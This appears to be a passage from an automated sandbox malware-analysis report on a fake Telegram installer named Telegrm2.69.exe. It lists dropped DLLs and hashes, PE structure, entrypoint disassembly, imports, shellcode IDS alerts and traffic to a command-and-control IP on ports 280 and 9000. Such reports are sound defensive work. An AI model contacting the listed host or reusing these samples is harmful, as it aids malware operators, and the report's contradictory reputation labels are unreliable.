                                          SHA-512:1B4350D51C2107D0AA22EB01D64E1F1AB73C28114045C388BAF9547CC39A902C8A274A24479C7C2599F94C96F8772E438F21A2849316B5BD7F5D47C26A1E483B
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                          Joe Sandbox View:
                                          • Filename: file_6c73ff4553d147e39fc35434c1e9e972_2024-07-30_02_54_11_351000.zip, Detection: malicious, Browse
                                          • Filename: SvpnLong2.exe, Detection: malicious, Browse
                                          • Filename: SvpnLong2.exe, Detection: malicious, Browse
                                          • Filename: Cbrome1.0.exe, Detection: malicious, Browse
                                          • Filename: Supe.exe, Detection: malicious, Browse
                                          • Filename: Cbrome1.0.exe, Detection: malicious, Browse
                                          • Filename: Supe.exe, Detection: malicious, Browse
                                          • Filename: 7Y18r(111).exe, Detection: malicious, Browse
                                          • Filename: 7Y18r(111).exe, Detection: malicious, Browse
                                          • Filename: SgSetup.exe, Detection: malicious, Browse
                                          Reputation:moderate, very likely benign file
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........i...:...:...:...;...:...;)..:...;...:...;...:...;...:...;...:...;...:3..;...:...:...:3..;...:3.4:...:..\:...:3..;...:Rich...:........................PE..d......`.........."..........t......$..........@....................................j.....`..........................................................p...-...P.......h..0;......l...P...8.......................(.................... ..@............................text............................... ..`.rdata..F.... ......................@..@.data...L&... ......................@....pdata.......P......................@..@.rsrc....-...p.......2..............@..@.reloc..l............`..............@..B........................................................................................................................................................................................................................

                                          C:\ProgramData\icret\arphaDump64.dll

                                          Download File
                                          Process:C:\Users\user\Desktop\Telegrm2.69.exe
                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                          Category:dropped
                                          Size (bytes):2199488
                                          Entropy (8bit):7.683305461232812
                                          Encrypted:false
                                          SSDEEP:49152:IKfnUHT6pdHDy6kwNvtazNJCF0oCY+AtClkgTePCUWk:xf1pRmWvtkJCF5Fgq6Xk
                                          MD5:5D165E30CDB59FDCCBD2ACE554EF3DF7
                                          SHA1:20344ECC0639934EB752C2F28AC2A0E37BA1852E
                                          SHA-256:7FCD3560EF424424DBD26B8E1BA90CA0F6198AA1D0BDA44F92CB880F4666A1F1
                                          SHA-512:7EF245B877C5FEB431794BE1E267845AE1E29723BDB5866B02AAEFF589EB2F6232E1A033BFEF7C711E9812939E2C931893B9D5BED862E6F6BD6101262572854A
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 58%
                                          • Antivirus: Virustotal, Detection: 47%, Browse
                                          Joe Sandbox View:
                                          • Filename: file_6c73ff4553d147e39fc35434c1e9e972_2024-07-30_02_54_11_351000.zip, Detection: malicious, Browse
                                          • Filename: SvpnLong2.exe, Detection: malicious, Browse
                                          • Filename: SvpnLong2.exe, Detection: malicious, Browse
                                          • Filename: Cbrome1.0.exe, Detection: malicious, Browse
                                          • Filename: Supe.exe, Detection: malicious, Browse
                                          • Filename: 7Y18r(111).exe, Detection: malicious, Browse
                                          • Filename: 7Y18r(111).exe, Detection: malicious, Browse
                                          • Filename: SgSetup.exe, Detection: malicious, Browse
                                          • Filename: MFCApplication3.exe, Detection: malicious, Browse
                                          • Filename: MFCApplication3.exe, Detection: malicious, Browse
                                          Reputation:moderate, very likely benign file
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h-)..Cz..Cz..Cz.[.z..Cz.[.z..Cz.[.z..Cz..8z..Cz..Bz..Cz.[.z..Cz.[.z..Cz.[.z..CzRich..Cz................PE..d...#..f.........." .......... .....4.........................................!......{!...@.....................................................(.... ... ..........f!..)....!.....P................................................................................text............................... ..`.rdata..c2.......4..................@..@.data...."..........................@....pdata..............................@..@.rsrc..... .. .... .................@..@.reloc........!......b!.............@..B........................................................................................................................................................................................................................................................................

                                          C:\Windows\Temp\49ba59abbe56e057.log

                                          Download File
                                          Process:C:\Users\user\Desktop\Telegrm2.69.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):18432
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3::
                                          MD5:F9DEBE3F07BE68533BF0295E3D2BA68A
                                          SHA1:1CA1B255C5C75F83BE93EF3370770B9ACE9B6427
                                          SHA-256:F7B586904E3678145AA47E4232587C913139CEF0102D6D8E9276FC80C35CBAD3
                                          SHA-512:1187551D3D26549765EAF562C32D5F8999E2961ED8A3011604A29735579711737752C63B7F11D7A6D366A7423089DDF94D954413B3EC4A19673C73F2FEB177B6
                                          Malicious:false
                                          Reputation:low
                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          Static File Info

                                          General

                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                          Entropy (8bit):7.996029397108862
                                          TrID:
                                          • Win64 Executable GUI (202006/5) 77.37%
                                          • InstallShield setup (43055/19) 16.49%
                                          • Win64 Executable (generic) (12005/4) 4.60%
                                          • Generic Win/DOS Executable (2004/3) 0.77%
                                          • DOS Executable Generic (2002/1) 0.77%
                                          File name:Telegrm2.69.exe
                                          File size:27'643'656 bytes
                                          MD5:30d73384015546e788046f3d30b50b20
                                          SHA1:c70e8b2b6ab3bbf80cf64113d5d71924045833eb
                                          SHA256:29dba2fc79da42f87eaeccf27170e523602d386134e0dab6c61b4f0092040e45
                                          SHA512:8ee8ec493ee46380fabea29d420de43ea6fd8ceed7624d35068a50609f2878fb3049ef5ba19162b2f3712a78867b0644b0f01ced70f5e9c3b90bd056ae0f2981
                                          SSDEEP:393216:BzYsUC7yQ/zBe3l7Zzj/uvGtTvsbJyJAbY23cXnYK+t5kImuTOLEBZNimjuTFLd2:BzxQ9mIT0b3C3ry5k2aLEBTiBhA
                                          TLSH:AF57331B32A54DFBEC2C94B6D407CA0293B2B9259752C7878694732FAFF38A44D14B1D
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............j...j...j.......j.......j...j...h...8..Kj...8...j...8..|j...8...j...8...j...8...j..Rich.j..........................PE..d..

                                          File Icon

                                          Icon Hash:1b870f278a898c65

                                          Static PE Info

                                          General

                                          Entrypoint:0x14001c414
                                          Entrypoint Section:.text
                                          Digitally signed:true
                                          Imagebase:0x140000000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x66AE3DAC [Sat Aug 3 14:24:44 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:5
                                          OS Version Minor:2
                                          File Version Major:5
                                          File Version Minor:2
                                          Subsystem Version Major:5
                                          Subsystem Version Minor:2
                                          Import Hash:df8a3b569f44b7154d8e1bd86b162dc8

                                          Authenticode Signature

                                          Signature Valid:false
                                          Signature Issuer:CN=GlobalSign GCC R45 CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                          Signature Validation Error:The digital signature of the object did not verify
                                          Error Number:-2146869232
                                          Not Before, Not After
                                          • 06/07/2023 07:34:03 06/07/2026 07:34:03
                                          Subject Chain
                                          • CN="Beijing Zhike Online Technology Co., Ltd.", O="Beijing Zhike Online Technology Co., Ltd.", L=Beijing, S=Beijing, C=CN
                                          Version:3
                                          Thumbprint MD5:D8E1475A0A4309B222A90E6A98E32471
                                          Thumbprint SHA-1:558E6045BBB495A63E1BA32A6F8B317C6B8BAD7E
                                          Thumbprint SHA-256:19BFE5ECB1F0A5176482D01AFB18DAFD497CA33B501B7CF8A876085A1CF02A27
                                          Serial:1EA18A3550A66F28BFADAFE2

                                          Entrypoint Preview

                                          Instruction
                                          dec eax
                                          sub esp, 28h
                                          call 00007F35AC6E60E4h
                                          dec eax
                                          add esp, 28h
                                          jmp 00007F35AC6DF7C7h
                                          int3
                                          int3
                                          dec eax
                                          mov dword ptr [esp+08h], ebx
                                          dec eax
                                          mov dword ptr [esp+10h], esi
                                          push edi
                                          dec eax
                                          sub esp, 20h
                                          dec eax
                                          mov ebx, ecx
                                          dec eax
                                          cmp ecx, FFFFFFE0h
                                          jnbe 00007F35AC6DFA2Eh
                                          mov edi, 00000001h
                                          dec eax
                                          test ecx, ecx
                                          dec eax
                                          cmovne edi, ecx
                                          dec eax
                                          mov ecx, dword ptr [00027C3Dh]
                                          dec eax
                                          test ecx, ecx
                                          jne 00007F35AC6DF9D2h
                                          call 00007F35AC6E34E8h
                                          mov ecx, 0000001Eh
                                          call 00007F35AC6E32B6h
                                          mov ecx, 000000FFh
                                          call 00007F35AC6DF120h
                                          dec eax
                                          mov ecx, dword ptr [00027C18h]
                                          dec esp
                                          mov eax, edi
                                          xor edx, edx
                                          call dword ptr [00010DC5h]
                                          dec eax
                                          mov esi, eax
                                          dec eax
                                          test eax, eax
                                          jne 00007F35AC6DF9DEh
                                          cmp dword ptr [00027C07h], eax
                                          je 00007F35AC6DF9C0h
                                          dec eax
                                          mov ecx, ebx
                                          call 00007F35AC6E3DDAh
                                          test eax, eax
                                          je 00007F35AC6DF9BFh
                                          jmp 00007F35AC6DF95Dh
                                          call 00007F35AC6E04EFh
                                          mov dword ptr [eax], 0000000Ch
                                          call 00007F35AC6E04E4h
                                          mov dword ptr [eax], 0000000Ch
                                          dec eax
                                          mov eax, esi
                                          jmp 00007F35AC6DF9C4h
                                          call 00007F35AC6E3DB4h
                                          call 00007F35AC6E04CFh
                                          mov dword ptr [eax], 0000000Ch
                                          xor eax, eax
                                          dec eax
                                          mov ebx, dword ptr [esp+30h]
                                          dec eax
                                          mov esi, dword ptr [esp+38h]
                                          dec eax
                                          add esp, 20h

                                          Rich Headers

                                          Programming Language:
                                          • [ C ] VS2005 build 50727
                                          • [IMP] VS2005 build 50727
                                          • [ C ] VS2008 build 21022
                                          • [ASM] VS2008 build 21022
                                          • [C++] VS2008 build 21022
                                          • [RES] VS2008 build 21022
                                          • [LNK] VS2008 build 21022

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3b2600xb4.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x4a0000x1a135cc.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x460000x3264.pdata
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x1a59c000x3308.rsrc
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1a5e0000xbf4.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x2d9800x1c.rdata
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x2d0000x858.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3b1c00x40.rdata
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x2bfa80x2c000e13b8d8f8c9d67b6d93c5bc837ec54a9False0.5004605379971591data6.302506896552274IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata0x2d0000xfd0e0xfe0050e072d27a55efd1c4e756865fd2df0eFalse0.3192667322834646data4.577364574810597IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0x3d0000x86780x2c0099aa4987c8e945a9c96c11c29d9db7b4False0.2489346590909091data3.4340787669015636IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .pdata0x460000x32640x3400fc94e7c92e6083c5e7a152adc667f27dFalse0.44974459134615385PEX Binary Archive5.333923017294334IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .rsrc0x4a0000x1a140000x1a1360087ec316afb3d62f6e4e3374f1195c9a8unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x1a5e0000x42940x44007945210412c6d66ff7cd0feb43e4f2b1False0.08139935661764706data1.576952963547732IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          FLAC0x4b26c0x1a08fcfFLAC audio bitstream data, 24 bit, stereo, 48 kHz, 5990400 samples0.991572380065918
                                          RT_CURSOR0x1a5423c0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"ChineseChina0.4805194805194805
                                          RT_CURSOR0x1a543700xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"ChineseChina0.7
                                          RT_CURSOR0x1a544240x134AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdChineseChina0.36363636363636365
                                          RT_CURSOR0x1a545580x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"ChineseChina0.35714285714285715
                                          RT_CURSOR0x1a5468c0x134dataChineseChina0.37337662337662336
                                          RT_CURSOR0x1a547c00x134dataChineseChina0.37662337662337664
                                          RT_CURSOR0x1a548f40x134Targa image data 64 x 65536 x 1 +32 "\001"ChineseChina0.36688311688311687
                                          RT_CURSOR0x1a54a280x134Targa image data 64 x 65536 x 1 +32 "\001"ChineseChina0.37662337662337664
                                          RT_CURSOR0x1a54b5c0x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"ChineseChina0.36688311688311687
                                          RT_CURSOR0x1a54c900x134Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"ChineseChina0.38636363636363635
                                          RT_CURSOR0x1a54dc40x134dataChineseChina0.44155844155844154
                                          RT_CURSOR0x1a54ef80x134dataChineseChina0.4155844155844156
                                          RT_CURSOR0x1a5502c0x134AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdChineseChina0.5422077922077922
                                          RT_CURSOR0x1a551600x134dataChineseChina0.2662337662337662
                                          RT_CURSOR0x1a552940x134dataChineseChina0.2824675324675325
                                          RT_CURSOR0x1a553c80x134dataChineseChina0.3246753246753247
                                          RT_CURSOR0x1a554fc0x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"ChineseChina0.4025974025974026
                                          RT_CURSOR0x1a556300xb4dataChineseChina0.55
                                          RT_BITMAP0x1a556e40x428Device independent bitmap graphic, 128 x 15 x 4, image size 960ChineseChina0.3618421052631579
                                          RT_BITMAP0x1a55b0c0xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80ChineseChina0.44565217391304346
                                          RT_BITMAP0x1a55bc40x144Device independent bitmap graphic, 33 x 11 x 4, image size 220ChineseChina0.37962962962962965
                                          RT_ICON0x1a55d080x668Device independent bitmap graphic, 48 x 96 x 4, image size 0ChineseChina0.18841463414634146
                                          RT_ICON0x1a563700x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0ChineseChina0.33064516129032256
                                          RT_ICON0x1a566580x128Device independent bitmap graphic, 16 x 32 x 4, image size 0ChineseChina0.5135135135135135
                                          RT_ICON0x1a567800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0ChineseChina0.5647654584221748
                                          RT_ICON0x1a576280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0ChineseChina0.7445848375451264
                                          RT_ICON0x1a57ed00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0ChineseChina0.6141618497109826
                                          RT_ICON0x1a584380x1ca8Device independent bitmap graphic, 48 x 96 x 24, image size 0ChineseChina0.42420937840785167
                                          RT_ICON0x1a5a0e00xca8Device independent bitmap graphic, 32 x 64 x 24, image size 0ChineseChina0.5509259259259259
                                          RT_ICON0x1a5ad880x368Device independent bitmap graphic, 16 x 32 x 24, image size 0ChineseChina0.7603211009174312
                                          RT_ICON0x1a5b0f00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640ChineseChina0.2540322580645161
                                          RT_ICON0x1a5b3d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192ChineseChina0.4560810810810811
                                          RT_MENU0x1a5b5000x128dataChineseChina0.652027027027027
                                          RT_MENU0x1a5b6280x294dataChineseChina0.5348484848484848
                                          RT_DIALOG0x1a5b8bc0x120dataChineseChina0.6354166666666666
                                          RT_DIALOG0x1a5b9dc0xe2dataChineseChina0.6814159292035398
                                          RT_DIALOG0x1a5bac00x166dataChineseChina0.48044692737430167
                                          RT_DIALOG0x1a5bc280x142dataChineseChina0.5279503105590062
                                          RT_DIALOG0x1a5bd6c0x34dataChineseChina0.9038461538461539
                                          RT_STRING0x1a5bda00x54dataChineseChina0.7261904761904762
                                          RT_STRING0x1a5bdf40x7adataChineseChina0.4426229508196721
                                          RT_STRING0x1a5be700x2edataChineseChina0.6304347826086957
                                          RT_STRING0x1a5bea00xdedataChineseChina0.6666666666666666
                                          RT_STRING0x1a5bf800xc0dataChineseChina0.11979166666666667
                                          RT_STRING0x1a5c0400x124dataChineseChina0.6575342465753424
                                          RT_STRING0x1a5c1640xe0dataChineseChina0.5892857142857143
                                          RT_STRING0x1a5c2440x60dataChineseChina0.7708333333333334
                                          RT_STRING0x1a5c2a40x54dataChineseChina0.5357142857142857
                                          RT_STRING0x1a5c2f80x46dataChineseChina0.7428571428571429
                                          RT_STRING0x1a5c3400x58dataChineseChina0.5340909090909091
                                          RT_STRING0x1a5c3980x9adataChineseChina0.7337662337662337
                                          RT_STRING0x1a5c4340x4adataChineseChina0.7837837837837838
                                          RT_STRING0x1a5c4800x68dataChineseChina0.8846153846153846
                                          RT_STRING0x1a5c4e80x2cdataChineseChina0.5909090909090909
                                          RT_STRING0x1a5c5140x82dataChineseChina0.9307692307692308
                                          RT_STRING0x1a5c5980xf2dataChineseChina0.5661157024793388
                                          RT_STRING0x1a5c68c0x1d6dataChineseChina0.8148936170212766
                                          RT_STRING0x1a5c8640x160dataChineseChina0.4971590909090909
                                          RT_STRING0x1a5c9c40x12edataChineseChina0.652317880794702
                                          RT_STRING0x1a5caf40x50dataChineseChina0.7125
                                          RT_STRING0x1a5cb440x44dataChineseChina0.6764705882352942
                                          RT_STRING0x1a5cb880x68dataChineseChina0.7019230769230769
                                          RT_STRING0x1a5cbf00x1b8dataChineseChina0.6568181818181819
                                          RT_STRING0x1a5cda80x104dataChineseChina0.6038461538461538
                                          RT_STRING0x1a5ceac0x24dataChineseChina0.4722222222222222
                                          RT_STRING0x1a5ced00x30dataChineseChina0.625
                                          RT_ACCELERATOR0x1a5cf000x70dataChineseChina0.6785714285714286
                                          RT_ACCELERATOR0x1a5cf700x18dataChineseChina1.2083333333333333
                                          RT_GROUP_CURSOR0x1a5cf880x22Lotus unknown worksheet or configuration, revision 0x2ChineseChina1.0294117647058822
                                          RT_GROUP_CURSOR0x1a5cfac0x22Lotus unknown worksheet or configuration, revision 0x2ChineseChina1.0294117647058822
                                          RT_GROUP_CURSOR0x1a5cfd00x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                          RT_GROUP_CURSOR0x1a5cfe40x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                          RT_GROUP_CURSOR0x1a5cff80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                          RT_GROUP_CURSOR0x1a5d00c0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                          RT_GROUP_CURSOR0x1a5d0200x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                          RT_GROUP_CURSOR0x1a5d0340x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                          RT_GROUP_CURSOR0x1a5d0480x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                          RT_GROUP_CURSOR0x1a5d05c0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                          RT_GROUP_CURSOR0x1a5d0700x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                          RT_GROUP_CURSOR0x1a5d0840x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                          RT_GROUP_CURSOR0x1a5d0980x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                          RT_GROUP_CURSOR0x1a5d0ac0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                          RT_GROUP_CURSOR0x1a5d0c00x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                          RT_GROUP_CURSOR0x1a5d0d40x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                          RT_GROUP_ICON0x1a5d0e80x84dataChineseChina0.6515151515151515
                                          RT_GROUP_ICON0x1a5d16c0x22dataChineseChina1.0588235294117647
                                          RT_VERSION0x1a5d1900x2b8COM executable for DOSChineseChina0.5114942528735632
                                          RT_MANIFEST0x1a5d4480x165ASCII text, with CRLF line terminatorsEnglishUnited States0.5434173669467787
                                          None0x1a5d5b00x1cdataChineseChina1.25

                                          Imports

                                          DLLImport
                                          KERNEL32.dllEncodePointer, DecodePointer, FlsGetValue, FlsSetValue, FlsFree, FlsAlloc, GetACP, IsValidCodePage, LCMapStringA, LCMapStringW, GetStdHandle, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, HeapSetInformation, QueryPerformanceCounter, GetStringTypeA, GetStringTypeW, GetConsoleCP, GetConsoleMode, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, Sleep, HeapSize, HeapReAlloc, HeapQueryInformation, RtlPcToFileHeader, RaiseException, RtlUnwindEx, HeapFree, HeapAlloc, GetStartupInfoA, GetCommandLineA, ExitProcess, GetSystemTimeAsFileTime, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, GetModuleHandleW, SetErrorMode, GetOEMCP, GetCPInfo, CreateFileA, GetCurrentProcess, FlushFileBuffers, SetFilePointer, WriteFile, FormatMessageA, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, GlobalHandle, GlobalReAlloc, TlsAlloc, InitializeCriticalSection, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, LocalFree, LocalAlloc, GetModuleFileNameW, GlobalFlags, MulDiv, GlobalGetAtomNameA, GlobalFindAtomA, MultiByteToWideChar, lstrcmpW, GetVersionExA, GlobalAddAtomA, WritePrivateProfileStringA, FreeResource, GlobalFree, GetCurrentProcessId, lstrlenA, GetTickCount, GlobalDeleteAtom, GetCurrentThread, GetCurrentThreadId, ConvertDefaultLocale, EnumResourceLanguagesA, GetModuleFileNameA, GetLocaleInfoA, WideCharToMultiByte, CompareStringA, FindResourceA, LoadResource, LockResource, SizeofResource, GlobalAlloc, FreeLibrary, GlobalUnlock, GlobalLock, lstrcmpA, GetLastError, SetLastError, LoadLibraryA, GetModuleHandleA, CopyFileExA, DeleteFileA, GetProcAddress, LoadLibraryW, CloseHandle, CreateMutexA, HeapCreate
                                          USER32.dllUnregisterClassA, GetSysColorBrush, EndPaint, BeginPaint, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, ClientToScreen, LoadCursorA, GetDC, ReleaseDC, RegisterWindowMessageA, LoadIconA, WinHelpA, GetCapture, GetClassLongA, GetClassNameA, GetClassLongPtrA, SetPropA, GetPropA, RemovePropA, GetForegroundWindow, GetTopWindow, SetWindowLongPtrA, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, MapWindowPoints, SetMenu, SetForegroundWindow, GetClientRect, GetSubMenu, GetMenuItemID, GetMenuItemCount, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, GetSysColor, AdjustWindowRectEx, CopyRect, PtInRect, DefWindowProcA, CallWindowProcA, GetMenu, SystemParametersInfoA, IsIconic, GetWindowPlacement, GetWindowRect, GetSystemMetrics, SetCursor, SetWindowsHookExA, CallNextHookEx, GetMessageA, TranslateMessage, DispatchMessageA, UpdateWindow, EnableWindow, PostQuitMessage, PostMessageA, RegisterClipboardFormatA, IsWindowVisible, GetKeyState, PeekMessageA, GetCursorPos, ValidateRect, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, LoadBitmapA, ModifyMenuA, GetMenuState, EnableMenuItem, CheckMenuItem, GetDesktopWindow, GetActiveWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, GetWindowLongPtrA, MessageBoxA, IsWindowEnabled, GetLastActivePopup, GetParent, GetWindowLongA, SendMessageA, GetWindowThreadProcessId, SetWindowPos, GetWindow, DestroyMenu, GetDlgItem, SendDlgItemMessageA, IsDialogMessageA, SetWindowTextA, IsWindow, GetDlgCtrlID, ShowWindow, SetFocus, GetFocus, GetWindowTextA, EndDialog, GetNextDlgTabItem
                                          GDI32.dllTextOutA, ExtTextOutA, Escape, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowExtEx, ScaleWindowExtEx, RectVisible, PtVisible, CreateBitmap, SetMapMode, RestoreDC, SaveDC, GetStockObject, GetDeviceCaps, DeleteDC, DeleteObject, SelectObject, GetObjectA, SetBkColor, SetTextColor, GetClipBox
                                          WINSPOOL.DRVDocumentPropertiesA, ClosePrinter, OpenPrinterA
                                          ADVAPI32.dllRegEnumKeyA, RegQueryValueA, RegOpenKeyA, RegCloseKey, RegDeleteKeyA, RegSetValueExA, RegCreateKeyExA, RegOpenKeyExA, RegQueryValueExA
                                          COMCTL32.dllInitCommonControlsEx
                                          SHLWAPI.dllPathFindFileNameA, PathFindExtensionA
                                          OLEAUT32.dllVariantClear, VariantChangeType, VariantInit

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          ChineseChina
                                          EnglishUnited States

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                          2024-08-04T12:47:29.384000+0200TCP2011803ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected900049744154.198.53.117192.168.2.4
                                          2024-08-04T12:47:03.233957+0200TCP2011803ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected900049733154.198.53.117192.168.2.4

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Aug 4, 2024 12:46:59.911946058 CEST49732280192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:46:59.920054913 CEST28049732154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:46:59.920250893 CEST49732280192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:46:59.920718908 CEST49732280192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:46:59.925508022 CEST28049732154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:00.826826096 CEST28049732154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:00.874383926 CEST49732280192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:01.109508991 CEST28049732154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:01.155419111 CEST49732280192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:01.426187992 CEST497339000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:01.431237936 CEST900049733154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:01.431440115 CEST497339000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:01.431440115 CEST497339000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:01.436400890 CEST900049733154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:02.334286928 CEST900049733154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:02.334306955 CEST900049733154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:02.334319115 CEST900049733154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:02.334532022 CEST497339000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:02.374341965 CEST497339000192.168.2.4154.198.53.117
                                          Aug 4, 2024 12:47:02.558074951 CEST900049733154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:02.558362961 CEST900049733154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:02.558372974 CEST900049733154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:02.558382034 CEST900049733154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:02.558392048 CEST900049733154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:02.558401108 CEST900049733154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:02.558413029 CEST900049733154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:02.558427095 CEST900049733154.198.53.117192.168.2.4
                                          Aug 4, 2024 12:47:02.558641911 CEST497339000192.168.2.4154.198.53.117
